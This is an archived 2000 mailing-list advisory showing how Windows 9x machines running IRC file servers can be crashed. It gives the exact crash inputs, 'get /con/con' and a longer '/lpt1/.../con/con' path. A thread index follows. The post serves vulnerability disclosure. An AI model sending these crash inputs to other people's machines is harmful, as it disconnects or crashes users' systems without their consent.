Vulnerability Development mailing list archives
ADV: /con/con is yet exploitable on most fservs
From: prrar () NITNET COM BR (Paulo Ribeiro)
Date: Wed, 7 Jun 2000 15:56:56 -0300
The /dev/dev Win9x bug can be exploited on fservs at IRC. If you access the fserv and try: <hee> fserv... <you> get /con/con You may receive: hee has quit (Connection reset by peer) or <hee> Invalid filename (or something like this). So, you may try: <you> get /lpt1/lpt1/lpt1/lpt1/lpt1/lpt1/lpt1/lpt1/con/con And you shall receive: hee has quit (Connection reset by peer) Yours, Paulo Ribeiro.
Current thread:
- Re: krb5 1.1.1 Trevor Schroeder (May 31)
- Re: krb5 1.1.1 Mariusz Woloszyn (Jun 05)
- ADV: /con/con is yet exploitable on most fservs Paulo Ribeiro (Jun 07)
- Re: ADV: /con/con is yet exploitable on most fservs Cam (Jun 08)
- Re: A<D>V: /con/con is yet exploitable on most fservs Niall Smart (Jun 08)
- weird bug found marco (Jun 09)
- Re: weird bug found hypoclear - lUSt - (Linux Users Strike Today) (Jun 09)
- ie5 and .doc URLs Olivier Thereaux (Jun 09)
- Re: ie5 and .doc URLs Chris Tobkin (Jun 09)
- Re: ie5 and .doc URLs Olle Segerdahl (Jun 09)
- mdaemon 2.8.5.0 DoS Craig (Jun 09)
- Re: ie5 and .doc URLs security-lists () SERVER KAPOW DK (Jun 09)
- Re: ie5 and .doc URLs Jason Haar (Jun 11)
- ADV: /con/con is yet exploitable on most fservs Paulo Ribeiro (Jun 07)
- Re: krb5 1.1.1 Mariusz Woloszyn (Jun 05)